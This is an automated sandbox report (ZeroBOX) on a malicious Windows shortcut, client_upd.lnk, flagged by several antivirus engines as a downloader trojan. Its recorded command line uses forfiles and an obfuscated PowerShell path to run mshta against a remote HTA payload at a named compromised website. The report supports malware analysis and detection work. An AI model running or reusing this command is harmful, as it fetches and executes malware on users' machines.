Summary | ZeroBOX

client_upd.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 8, 2023, 4:09 p.m. Sept. 8, 2023, 4:11 p.m.
Size 2.0KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=79, Archive, ctime=Sat Dec 7 00:09:57 2019, mtime=Sat Sep 2 07:33:26 2023, atime=Sat Dec 7 00:09:57 2019, length=41472, window=hidenormalshowminimized
MD5 b67e9a5be90034b0814412603f5ba09e
SHA256 82a78bf48a26c07f60ae2cc035992894bf8584e28c881c32b19ce620fa10c8fa
CRC32 94D6F319
ssdeep 24:8XoEMu4JPpyA1k8WfyMUIsyMb+UHKb+/4Y5ws4flBsaW/ab/2XTfm:8X/Mum7IYgLflBsnab2jf
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: ERROR: The specified directory does not exist.
console_handle: 0x0000000b
1 1 0
file C:\Users\test22\AppData\Local\Temp\client_upd.lnk
cmdline "C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta
Symantec CL.Downloader!gen111
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
Sophos Troj/LnkObf-W
ZoneAlarm HEUR:Trojan-Downloader.WinLNK.Powedon.gen
Google Detected
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Process injection Process 3024 resumed a thread in remote process 2208
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2208
1 0 0